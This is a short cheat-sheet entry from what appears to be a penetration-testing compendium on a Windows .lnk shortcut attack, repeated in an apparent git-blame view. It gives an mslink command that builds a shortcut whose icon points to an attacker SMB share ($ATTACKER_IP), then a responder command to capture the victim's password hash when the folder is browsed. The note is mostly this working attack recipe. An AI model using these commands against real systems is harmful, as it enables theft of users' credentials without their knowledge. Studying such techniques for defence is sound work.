killchain-compendium/Exploits/Windows/LNK Exploit.md

# .lnk exploit

* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)

* Target does not even have to open the link directly

```sh 
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
```
* Start a responder and wait for user's hash
```sh
responder -I eth0
```
restructured Exploits 2022-11-13 22:38:01 +01:00			`# .lnk exploit`

			`* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)`
			`* [mamachine's tool](http://mamachine.org/mslink/index.en.html)`

			`* Target does not even have to open the link directly`

			```sh
			`mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk`
			```
			`* Start a responder and wait for user's hash`
			```sh
			`responder -I eth0`
			```